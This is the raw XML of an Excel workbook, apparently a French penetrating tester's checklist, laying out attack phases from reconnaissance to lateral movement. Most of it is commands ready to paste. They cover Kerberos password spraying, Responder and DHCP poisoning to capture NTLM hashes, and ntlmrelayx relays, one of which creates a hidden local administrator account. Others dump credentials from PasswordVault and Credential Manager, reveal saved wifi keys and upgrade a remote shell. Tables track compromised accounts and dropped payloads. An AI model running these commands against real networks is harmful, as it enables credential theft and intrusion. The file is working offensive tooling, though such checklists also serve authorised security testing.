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Devenir Pentester\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{DD8944DA-2AB4-4B02-B6B7-6508A6FDE49B}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="2340" yWindow="2340" windowWidth="21600" windowHeight="11385" firstSheet="1" activeTab="2" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="road-map-network" sheetId="3" r:id="rId1"/>
    <sheet name="road-map-wifi" sheetId="7" r:id="rId2"/>
    <sheet name="suivi-test" sheetId="9" r:id="rId3"/>
    <sheet name="Sites-Web" sheetId="4" r:id="rId4"/>
    <sheet name="Feuil1" sheetId="6" r:id="rId5"/>
    <sheet name="Allias" sheetId="5" r:id="rId6"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId7"/>
  </externalReferences>
  <definedNames>
    <definedName name="DNS_IP" localSheetId="2">[1]Allias!$B$15</definedName>
    <definedName name="DNS_IP">Allias!$B$15</definedName>
    <definedName name="domain" localSheetId="2">[1]Allias!$B$6</definedName>
    <definedName name="domain">Allias!$B$6</definedName>
    <definedName name="domain_IP" localSheetId="2">[1]Allias!$B$8</definedName>
    <definedName name="domain_IP">Allias!$B$8</definedName>
    <definedName name="hash" localSheetId="2">[1]Allias!$B$9</definedName>
    <definedName name="hash">Allias!$B$9</definedName>
    <definedName name="hostname" localSheetId="2">[1]Allias!$B$16</definedName>
    <definedName name="hostname">Allias!$B$16</definedName>
    <definedName name="interface">Allias!$B$14</definedName>
    <definedName name="IP" localSheetId="2">[1]Allias!$B$2</definedName>
    <definedName name="IP">Allias!$B$2</definedName>
    <definedName name="list_domain">Allias!$B$7</definedName>
    <definedName name="list_hash">Allias!$B$10</definedName>
    <definedName name="list_IP">Allias!$B$3</definedName>
    <definedName name="list_password">Allias!$B$12</definedName>
    <definedName name="list_user">Allias!$B$5</definedName>
    <definedName name="list_users" localSheetId="2">[1]Allias!$B$5</definedName>
    <definedName name="list_users">Allias!$B$5</definedName>
    <definedName name="password" localSheetId="2">[1]Allias!$B$11</definedName>
    <definedName name="password">Allias!$B$11</definedName>
    <definedName name="subnet" localSheetId="2">[1]Allias!$B$13</definedName>
    <definedName name="subnet">Allias!$B$13</definedName>
    <definedName name="user" localSheetId="2">[1]Allias!$B$4</definedName>
    <definedName name="user">Allias!$B$4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3" l="1"/>
  <c r="D14" i="3"/>
  <c r="D8" i="3" l="1"/>
  <c r="D72" i="3"/>
  <c r="D68" i="3"/>
  <c r="D67" i="3"/>
  <c r="D66" i="3"/>
  <c r="D65" i="3"/>
  <c r="D64" i="3"/>
  <c r="D63" i="3"/>
  <c r="D62" i="3"/>
  <c r="D61" i="3"/>
  <c r="D60" i="3"/>
  <c r="D42" i="3"/>
  <c r="D41" i="3"/>
  <c r="D40" i="3"/>
  <c r="D39" i="3"/>
  <c r="D38" i="3"/>
  <c r="D34" i="3"/>
  <c r="D18" i="3"/>
  <c r="D19" i="3"/>
  <c r="D17" i="3"/>
  <c r="D20" i="3"/>
  <c r="D26" i="3"/>
  <c r="D25" i="3"/>
  <c r="D16" i="3"/>
  <c r="D15" i="3"/>
  <c r="D13" i="3"/>
  <c r="D12" i="3"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="301" uniqueCount="166">
  <si>
    <t>TOOLS</t>
  </si>
  <si>
    <t>PHASE</t>
  </si>
  <si>
    <t>UTILITE</t>
  </si>
  <si>
    <t>CMD à coller</t>
  </si>
  <si>
    <t>Informations</t>
  </si>
  <si>
    <t>CMD de base2</t>
  </si>
  <si>
    <t>ip</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>Identifier l@ip et réseau</t>
  </si>
  <si>
    <t>ip a</t>
  </si>
  <si>
    <t>Identiier les routes</t>
  </si>
  <si>
    <t>ip route show dev &lt;interface&gt;</t>
  </si>
  <si>
    <t>netdiscover</t>
  </si>
  <si>
    <t>Enumerer les hotes sur le réseau</t>
  </si>
  <si>
    <t>netdiscover -i &lt;interface&gt; -r &lt;targetSubnet&gt;</t>
  </si>
  <si>
    <t>arp-scan</t>
  </si>
  <si>
    <t>arp-scan -I &lt;interface&gt; &lt;targetSubnet&gt;</t>
  </si>
  <si>
    <t>nmap</t>
  </si>
  <si>
    <t>Enumerer les versions et execute les scripts par défaut sur une liste d'hotes dans un fichier</t>
  </si>
  <si>
    <t>sudo nmap -sV -sC -p- -iL host.txt -oA nmap_result</t>
  </si>
  <si>
    <t>Enumerer les versions et execute les scripts par défaut puis envois le résultat dans un fichier</t>
  </si>
  <si>
    <t>sudo nmap -sV -sC -p- &lt;ipAddr/scope&gt; -oA nmap_result</t>
  </si>
  <si>
    <t>https://www.stationx.net/nmap-cheat-sheet/</t>
  </si>
  <si>
    <t>dig</t>
  </si>
  <si>
    <t>Transfert de zone DNS</t>
  </si>
  <si>
    <t>enum4linux</t>
  </si>
  <si>
    <t>Enumération</t>
  </si>
  <si>
    <t>Enumération SMB / RPC</t>
  </si>
  <si>
    <t>ports:135-139,445</t>
  </si>
  <si>
    <t>enum4linux -a target-subnet/24</t>
  </si>
  <si>
    <t>enum4linux -a target-ip</t>
  </si>
  <si>
    <t>enum4linux -U target-ip</t>
  </si>
  <si>
    <t>enum4linux -G target-ip</t>
  </si>
  <si>
    <t>enum4linux -u username -p password -a dc-ip-address</t>
  </si>
  <si>
    <t>SNMP check</t>
  </si>
  <si>
    <t>port 161/162 et 1061/1062</t>
  </si>
  <si>
    <t xml:space="preserve">snmp-check 1&lt;IP&gt; -c public </t>
  </si>
  <si>
    <t>SNMPWALK</t>
  </si>
  <si>
    <t>NFS</t>
  </si>
  <si>
    <t>ports: 2049</t>
  </si>
  <si>
    <t>Partage SMB</t>
  </si>
  <si>
    <t>ports:135-139/445</t>
  </si>
  <si>
    <t>nmap --script smb-vuln* -p 139,445 [ip]</t>
  </si>
  <si>
    <t>smbmap</t>
  </si>
  <si>
    <t>smbmap -H =IP -u &lt;user&gt; -p &lt;password&gt;  -L</t>
  </si>
  <si>
    <t>smbmap -H &lt;adresse_IP&gt; -u &lt;user&gt; -p &lt;password&gt; -d &lt;nom_du_domaine&gt; -L -r &lt;dossier&gt; -A '(commence par|ou par).(se termine par .quelque chose|ou .par)</t>
  </si>
  <si>
    <t>smbmap -H &lt;adresse_ip&gt; -u &lt;user&gt; -p &lt;'hash'&gt;</t>
  </si>
  <si>
    <t>dnscan</t>
  </si>
  <si>
    <t>Brute-Force sous domain (utiliser une wordlist)</t>
  </si>
  <si>
    <t>WithSecure</t>
  </si>
  <si>
    <t>Scan l'infra avec les infos des phase Reco/Enum</t>
  </si>
  <si>
    <t>Lancer l'exe</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>Exploitation</t>
  </si>
  <si>
    <t>Améliore le shell distant</t>
  </si>
  <si>
    <t>python -c 'import pty; pty.spawn("/bin/bash")'</t>
  </si>
  <si>
    <t>kerbrute</t>
  </si>
  <si>
    <t>Permets de faire du Spraying password</t>
  </si>
  <si>
    <t>Spray</t>
  </si>
  <si>
    <t>spray.sh -smb &lt;targetIP&gt; &lt;usernameList&gt; &lt;passwordList&gt; &lt;AttemptsPerLockoutPeriod&gt; &lt;LockoutPeriodInMinutes&gt; &lt;DOMAIN&gt;</t>
  </si>
  <si>
    <t>Enumere les utilisateurs valide sur le domaine</t>
  </si>
  <si>
    <t>./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt</t>
  </si>
  <si>
    <t>brute-Force le mot de passe d'un utilisateur du domain</t>
  </si>
  <si>
    <t>./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman</t>
  </si>
  <si>
    <t>evil-winrm</t>
  </si>
  <si>
    <t>Etablie une sessoin distante</t>
  </si>
  <si>
    <t>port: 5985</t>
  </si>
  <si>
    <t>Permets d'executer une commande sur la machine distante</t>
  </si>
  <si>
    <t>Permets de charger un fichier sur la machine distante</t>
  </si>
  <si>
    <t>Permets de télécharger un fichier de la machine distante</t>
  </si>
  <si>
    <t>Permets d'executer un script sur la machine distante</t>
  </si>
  <si>
    <t>PoweShellMafia</t>
  </si>
  <si>
    <t>MSFvenom</t>
  </si>
  <si>
    <t>Création de charge</t>
  </si>
  <si>
    <t>Powershell</t>
  </si>
  <si>
    <t>Get-LocalUser | ft Name,Enabled,LastLogon</t>
  </si>
  <si>
    <t>Get-ChildItem C:\Users -Force | select Name</t>
  </si>
  <si>
    <t>Lister les SSID ou l'ordinateur à été connecté</t>
  </si>
  <si>
    <t>netsh wlan show profile</t>
  </si>
  <si>
    <t>Afficher en claire les mots de passe des SSID</t>
  </si>
  <si>
    <t>netsh wlan show profile &lt;SSID&gt; key=clear</t>
  </si>
  <si>
    <t>Recherche de documents</t>
  </si>
  <si>
    <t>gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue</t>
  </si>
  <si>
    <t>Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}</t>
  </si>
  <si>
    <t>Recherche mdp dans Sysprep ou Unattend files</t>
  </si>
  <si>
    <t>gci c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -EA SilentlyContinue</t>
  </si>
  <si>
    <t>Extraire les hashages SAM</t>
  </si>
  <si>
    <t>Obtenir les mots de passe stockés à partir de Windows PasswordVault</t>
  </si>
  <si>
    <t>[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ }</t>
  </si>
  <si>
    <t>port 137, 5355</t>
  </si>
  <si>
    <t>Obtenir les mots de passe stockés à partir de Windows Credential Manager ==ADMIN</t>
  </si>
  <si>
    <t>Install-Module -Name CredentialManager -Force ; Get-StoredCredential | ForEach-Object { Write-Host -NoNewLine $_.Username; Write-Host -NoNewLine ":"; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.Password); [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); }</t>
  </si>
  <si>
    <t>Registre de recherche pour les informations d'identification de connexion automatique</t>
  </si>
  <si>
    <t>gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon' | select "Default*"</t>
  </si>
  <si>
    <t>Responder</t>
  </si>
  <si>
    <t>Lancer Responder en écoute</t>
  </si>
  <si>
    <t>./Responder.py -I &lt;Interface&gt; -rv</t>
  </si>
  <si>
    <t>Responder en capture &gt; note: désactiver SMB et HTTP pour éviter les effets de bord avec Multy-Relay</t>
  </si>
  <si>
    <t>./Responder.py -I &lt;Interface&gt; --lm --disable-ess</t>
  </si>
  <si>
    <t>DHCP poisoning pour récuperer les hashes NTLMv1/2 (ATTENTION RISQUE)</t>
  </si>
  <si>
    <t>./Responder.py -I &lt;Interface&gt; -Pdv</t>
  </si>
  <si>
    <t>RunFinger</t>
  </si>
  <si>
    <t>Rechercher les machines du sous réseau pour lesquelles la signature SMB n'est pas obligatoire (-i) et les nulls session (-g)</t>
  </si>
  <si>
    <t>MultyRelay</t>
  </si>
  <si>
    <t>Lance le multirelay sur la cible avec tout les utilisateurs</t>
  </si>
  <si>
    <t>Permets de lancer une commande par exemple whoami</t>
  </si>
  <si>
    <t>Dump les Hashes</t>
  </si>
  <si>
    <t>crackmapexec</t>
  </si>
  <si>
    <t>Dump LSASS</t>
  </si>
  <si>
    <t>Script python d'automatistion multi cibles dans le git</t>
  </si>
  <si>
    <t>Metasploit</t>
  </si>
  <si>
    <t>Mouvement LAT/HOR</t>
  </si>
  <si>
    <t>Tente un shell merterpreter sur la cible</t>
  </si>
  <si>
    <t>Impacket</t>
  </si>
  <si>
    <t>Obtenir un shell via WMI</t>
  </si>
  <si>
    <t>Tente des connection avec evil-winrm avec les creds pour de la lateralisation</t>
  </si>
  <si>
    <t>git clone &lt;git&gt;
Lancer le scrypt sh ou py</t>
  </si>
  <si>
    <t>xfreeRDP</t>
  </si>
  <si>
    <t>Tente des connections rdp sur les hotes</t>
  </si>
  <si>
    <t>r</t>
  </si>
  <si>
    <t>https://www.networklab.fr/pen-test-wifi/</t>
  </si>
  <si>
    <t>Compte compromis</t>
  </si>
  <si>
    <t>Mot de passe / hash</t>
  </si>
  <si>
    <t>Machine</t>
  </si>
  <si>
    <t>Emplacement de la charge</t>
  </si>
  <si>
    <t>https://portforward.com/router-password/</t>
  </si>
  <si>
    <t>Switch / commutateurs / équipements / controleurs : accès par défaut ?</t>
  </si>
  <si>
    <t>http://oid-info.com/get/1.3.6.1.2.1.1</t>
  </si>
  <si>
    <t>Signification d'un OID</t>
  </si>
  <si>
    <t>http://www.oid-info.com/cgi-bin/display?tree=#focus</t>
  </si>
  <si>
    <t>Navigation dans les OID</t>
  </si>
  <si>
    <t>https://cve.mitre.org/</t>
  </si>
  <si>
    <t>https://www.exploit-db.com/</t>
  </si>
  <si>
    <t>https://www.rapid7.com/</t>
  </si>
  <si>
    <t>https://attackerkb.com/</t>
  </si>
  <si>
    <t>https://www.asafety.fr/reverse-shell-one-liner-cheat-sheet/</t>
  </si>
  <si>
    <t>divers reverse-shell</t>
  </si>
  <si>
    <t>https://github.com/PowerShellMafia/PowerSploit</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/</t>
  </si>
  <si>
    <t>crackmapexec smb --gen-relay-list /root/smb_sign_vulnerable.txt 192.168.11.0/24</t>
  </si>
  <si>
    <t xml:space="preserve">ntlmrelayx.py -tf /root/smb_sign_vulnerable.txt -w -of /root/NetNLM-hash.loot -smb2support </t>
  </si>
  <si>
    <t>ntlmrelayx.py -tf /root/smb_sign_vulnerable.txt -w -of /root/NetNLM-hash.loot -smb2support -c "net user USER Mdp** /add &amp;&amp; net localgroup administrateurs User /ADD"</t>
  </si>
  <si>
    <t># Execute cmd</t>
  </si>
  <si>
    <t>ntlmrelayx.py -tf /root/smb_sign_vulnerable.txt -w -of /root/NetNLM-hash.loot -smb2support -i</t>
  </si>
  <si>
    <t xml:space="preserve"> # interactive mode</t>
  </si>
  <si>
    <t>Nom</t>
  </si>
  <si>
    <t>Données</t>
  </si>
  <si>
    <t>Colonne1</t>
  </si>
  <si>
    <t>IP</t>
  </si>
  <si>
    <t>list_IP</t>
  </si>
  <si>
    <t>user</t>
  </si>
  <si>
    <t>list_users</t>
  </si>
  <si>
    <t>domain</t>
  </si>
  <si>
    <t>list_domain</t>
  </si>
  <si>
    <t>domain_IP</t>
  </si>
  <si>
    <t>hash</t>
  </si>
  <si>
    <t>list_hash</t>
  </si>
  <si>
    <t>password</t>
  </si>
  <si>
    <t>list_password</t>
  </si>
  <si>
    <t>subnet</t>
  </si>
  <si>
    <t>interface</t>
  </si>
  <si>
    <t>DNS_IP</t>
  </si>
  <si>
    <t>hostname</t>
  </si>
  <si>
    <t>Charge déposée</t>
  </si>
  <si>
    <t>Machine associée / Annuaire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</si>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</sst>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1D1F25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eyan-my.sharepoint.com/personal/vincent_callemyn_veyan_fr/Documents/Bureau/Scan%20de%20vuln&#233;rabilit&#233;s/Pentest/todolist_pentest.xlsx" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLinkPath" Target="https://veyan-my.sharepoint.com/personal/vincent_callemyn_veyan_fr/Documents/Bureau/Scan%20de%20vuln&#233;rabilit&#233;s/Pentest/todolist_pen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ad-map"/>
      <sheetName val="Allias"/>
      <sheetName val="Feuil1"/>
      <sheetName val="Sites-Web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88DB86-86BC-4E9F-93A6-A92290604431}" name="Tableau3" displayName="Tableau3" ref="A1:F1048575" totalsRowShown="0">
  <autoFilter ref="A1:F1048575" xr:uid="{5988DB86-86BC-4E9F-93A6-A92290604431}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{54234BE4-8385-403A-BC3B-A91C84468C7E}" name="TOOLS"/>
    <tableColumn id="2" xr3:uid="{E049AF5E-72D0-46B1-956A-523FCB18659E}" name="PHASE"/>
    <tableColumn id="3" xr3:uid="{105849AE-E87B-4548-91B2-B830699D6AE0}" name="UTILITE"/>
    <tableColumn id="5" xr3:uid="{485C719E-132D-4D91-9ACC-669750DDF3D9}" name="CMD à coller"/>
    <tableColumn id="6" xr3:uid="{6EDFFA2C-FD71-4CB2-9A05-BA2C30F4A7FD}" name="Informations"/>
    <tableColumn id="7" xr3:uid="{CDAD5CAA-FFC0-452F-AAF2-AE98C55A94F6}" name="CMD de bas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115FC5-D360-4BC3-8D04-EA66F18DFBAE}" name="Tableau2" displayName="Tableau2" ref="A1:D116" totalsRowShown="0" headerRowDxfId="1">
  <autoFilter ref="A1:D116" xr:uid="{3EAD501A-3F74-4E57-86F3-530B12199C65}"/>
  <tableColumns count="4">
    <tableColumn id="1" xr3:uid="{1C2CA8C0-E884-478A-8C0F-C68426D70C6E}" name="Compte compromis"/>
    <tableColumn id="2" xr3:uid="{A788A57A-D788-49CA-895E-19B13DF11A29}" name="Mot de passe / hash"/>
    <tableColumn id="5" xr3:uid="{E63BCBCF-E6D3-4024-9AAA-3069B612738C}" name="Description"/>
    <tableColumn id="3" xr3:uid="{3DD1B59F-FD4B-4F56-B67B-D361AA090C37}" name="Machine associée / Annuai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24BA6-48BF-4F2B-86B1-2547FFBF0806}" name="Tableau4" displayName="Tableau4" ref="G1:I117" totalsRowShown="0" headerRowDxfId="0">
  <autoFilter ref="G1:I117" xr:uid="{23BA1C42-CE19-4BC8-9741-096E85DCC50F}"/>
  <tableColumns count="3">
    <tableColumn id="1" xr3:uid="{4556B880-F8F9-4032-8340-1D9C66130400}" name="Charge déposée"/>
    <tableColumn id="2" xr3:uid="{93573FDD-CB60-4608-9E87-2F96D52FEBDE}" name="Machine"/>
    <tableColumn id="3" xr3:uid="{DD7DBC41-9068-4C17-9E16-7425A9F3440E}" name="Emplacement de la charge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607AE-CB39-4D89-9C15-1181BBCC82BE}" name="Tableau1" displayName="Tableau1" ref="A1:C20" totalsRowShown="0">
  <autoFilter ref="A1:C20" xr:uid="{70D607AE-CB39-4D89-9C15-1181BBCC82BE}"/>
  <tableColumns count="3">
    <tableColumn id="1" xr3:uid="{81E24BBA-501E-4F78-9D20-57956B5EDE40}" name="Nom"/>
    <tableColumn id="2" xr3:uid="{22DD8F9A-E3E7-4DA6-BDAA-A81CC73A9CDC}" name="Données"/>
    <tableColumn id="3" xr3:uid="{FEB07B86-688F-4974-A3F8-48A5817710F3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tationx.net/nmap-cheat-she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worklab.fr/pen-test-wifi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lbas-project.github.io/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://oid-info.com/get/1.3.6.1.2.1.1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.asafety.fr/reverse-shell-one-liner-cheat-sheet/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7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78EC-FED5-4148-B26F-2525A9F9CE2F}">
  <sheetPr>
    <tabColor theme="9"/>
  </sheetPr>
  <dimension ref="A1:H75"/>
  <sheetViews>
    <sheetView topLeftCell="A26" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="D76" sqref="D76"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="14.140625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="28.28515625" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="82.7109375" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="114.28515625" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="39.140625" customWidth="1"/>
    <col min="6" max="6" width="8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F3" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>12</v>
      </c>
      <c r="B4" t="s">
        <v>7</v>
      </c>
      <c r="C4" t="s">
        <v>13</v>
      </c>
      <c r="D4" t="s">
        <v>14</v>
      </c>
      <c r="F4" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5" t="s">
        <v>15</v>
      </c>
      <c r="B5" t="s">
        <v>7</v>
      </c>
      <c r="C5" t="s">
        <v>13</v>
      </c>
      <c r="D5" t="s">
        <v>16</v>
      </c>
      <c r="F5" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6" t="s">
        <v>17</v>
      </c>
      <c r="B6" t="s">
        <v>7</v>
      </c>
      <c r="C6" t="s">
        <v>18</v>
      </c>
      <c r="D6" t="s">
        <v>19</v>
      </c>
      <c r="F6" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>17</v>
      </c>
      <c r="B7" t="s">
        <v>7</v>
      </c>
      <c r="C7" t="s">
        <v>20</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>21</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F7" s="1" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8" t="s">
        <v>23</v>
      </c>
      <c r="B8" t="s">
        <v>7</v>
      </c>
      <c r="C8" t="s">
        <v>24</v>
      </c>
      <c r="D8" t="str">
        <f>"dig axfr @"&amp;DNS_IP&amp;""</f>
        <v>dig axfr @DNS_IP</v>
      </c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ht="18.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A12" t="s">
        <v>25</v>
      </c>
      <c r="B12" t="s">
        <v>26</v>
      </c>
      <c r="C12" t="s">
        <v>27</v>
      </c>
      <c r="D12" s="1" t="str">
        <f>"enum4linux -a target-subnet/24"</f>
        <v>enum4linux -a target-subnet/24</v>
      </c>
      <c r="E12" t="s">
        <v>28</v>
      </c>
      <c r="F12" s="1" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="18" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A13" t="s">
        <v>25</v>
      </c>
      <c r="B13" t="s">
        <v>26</v>
      </c>
      <c r="C13" t="s">
        <v>27</v>
      </c>
      <c r="D13" s="1" t="str">
        <f>"enum4linux -a "&amp;IP&amp;""</f>
        <v>enum4linux -a IP</v>
      </c>
      <c r="E13" t="s">
        <v>28</v>
      </c>
      <c r="F13" s="1" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="18.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A14" t="s">
        <v>25</v>
      </c>
      <c r="B14" t="s">
        <v>26</v>
      </c>
      <c r="C14" t="s">
        <v>27</v>
      </c>
      <c r="D14" s="1" t="str">
        <f>"enum4linux -U "&amp;IP&amp;""</f>
        <v>enum4linux -U IP</v>
      </c>
      <c r="E14" t="s">
        <v>28</v>
      </c>
      <c r="F14" s="1" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15" t="s">
        <v>25</v>
      </c>
      <c r="B15" t="s">
        <v>26</v>
      </c>
      <c r="C15" t="s">
        <v>27</v>
      </c>
      <c r="D15" s="1" t="str">
        <f>"enum4linux -G "&amp;IP&amp;""</f>
        <v>enum4linux -G IP</v>
      </c>
      <c r="E15" t="s">
        <v>28</v>
      </c>
      <c r="F15" s="1" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="20.25" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A16" t="s">
        <v>25</v>
      </c>
      <c r="B16" t="s">
        <v>26</v>
      </c>
      <c r="C16" t="s">
        <v>27</v>
      </c>
      <c r="D16" s="1" t="str">
        <f>"enum4linux -u "&amp;user&amp;" -p "&amp;password&amp;" -a "&amp;domain_IP&amp;""</f>
        <v>enum4linux -u user -p password -a domain_IP</v>
      </c>
      <c r="E16" t="s">
        <v>28</v>
      </c>
      <c r="F16" s="1" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.25">
      <c r="C17" t="s">
        <v>34</v>
      </c>
      <c r="D17" t="str">
        <f>"snmp-check "&amp;IP&amp;" -c public  |more"</f>
        <v>snmp-check IP -c public  |more</v>
      </c>
      <c r="E17" t="s">
        <v>35</v>
      </c>
      <c r="F17" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18" t="s">
        <v>37</v>
      </c>
      <c r="D18" t="str">
        <f>"snmpwalk -v 2 -c public "&amp;IP&amp;""</f>
        <v>snmpwalk -v 2 -c public IP</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.25">
      <c r="C19" t="s">
        <v>38</v>
      </c>
      <c r="D19" t="str">
        <f>"showmount -e "&amp;IP&amp;""</f>
        <v>showmount -e IP</v>
      </c>
      <c r="E19" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="20" spans="1:6" ht="18.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A20" t="s">
        <v>17</v>
      </c>
      <c r="B20" t="s">
        <v>26</v>
      </c>
      <c r="C20" t="s">
        <v>40</v>
      </c>
      <c r="D20" s="1" t="str">
        <f>"nmap --script smb-vuln* -p 139,445 "&amp;IP&amp;""</f>
        <v>nmap --script smb-vuln* -p 139,445 IP</v>
      </c>
      <c r="E20" t="s">
        <v>41</v>
      </c>
      <c r="F20" s="1" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="36.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A21" t="s">
        <v>43</v>
      </c>
      <c r="B21" t="s">
        <v>26</v>
      </c>
      <c r="C21" t="s">
        <v>40</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>44</v>
      </c>
      <c r="E21" t="s">
        <v>41</v>
      </c>
      <c r="F21" s="1" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22" t="s">
        <v>43</v>
      </c>
      <c r="B22" t="s">
        <v>26</v>
      </c>
      <c r="C22" t="s">
        <v>40</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>45</v>
      </c>
      <c r="E22" t="s">
        <v>41</v>
      </c>
      <c r="F22" s="1" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="23" spans="1:6" ht="33.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A23" t="s">
        <v>43</v>
      </c>
      <c r="B23" t="s">
        <v>26</v>
      </c>
      <c r="C23" t="s">
        <v>40</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>46</v>
      </c>
      <c r="E23" t="s">
        <v>41</v>
      </c>
      <c r="F23" s="1" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.25">
      <c r="B24" t="s">
        <v>26</v>
      </c>
      <c r="C24" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25" t="s">
        <v>23</v>
      </c>
      <c r="B25" t="s">
        <v>26</v>
      </c>
      <c r="C25" t="s">
        <v>24</v>
      </c>
      <c r="D25" t="str">
        <f>"dig axfr @"&amp;DNS_IP&amp;" "&amp;domain&amp;""</f>
        <v>dig axfr @DNS_IP domain</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26" t="s">
        <v>47</v>
      </c>
      <c r="B26" t="s">
        <v>26</v>
      </c>
      <c r="C26" t="s">
        <v>48</v>
      </c>
      <c r="D26" t="str">
        <f>"dnscan -d "&amp;domain&amp;" -r -w subdomains-1000.txt"</f>
        <v>dnscan -d domain -r -w subdomains-1000.txt</v>
      </c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 t="s">
        <v>49</v>
      </c>
      <c r="B28" s="4" t="s">
        <v>26</v>
      </c>
      <c r="C28" s="4" t="s">
        <v>50</v>
      </c>
      <c r="D28" s="4" t="s">
        <v>51</v>
      </c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5" x14ac:dyDescent="0.25">
      <c r="A33" t="s">
        <v>52</v>
      </c>
      <c r="B33" t="s">
        <v>53</v>
      </c>
      <c r="C33" t="s">
        <v>54</v>
      </c>
      <c r="D33" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="34" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A34" t="s">
        <v>56</v>
      </c>
      <c r="B34" t="s">
        <v>53</v>
      </c>
      <c r="C34" t="s">
        <v>57</v>
      </c>
      <c r="D34" t="str">
        <f>"./kerbrute_linux_amd64 passwordspray -d "&amp;domain&amp;" "&amp;list_users&amp;" "&amp;password&amp;""</f>
        <v>./kerbrute_linux_amd64 passwordspray -d domain list_users password</v>
      </c>
    </row>
    <row r="35" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A35" t="s">
        <v>58</v>
      </c>
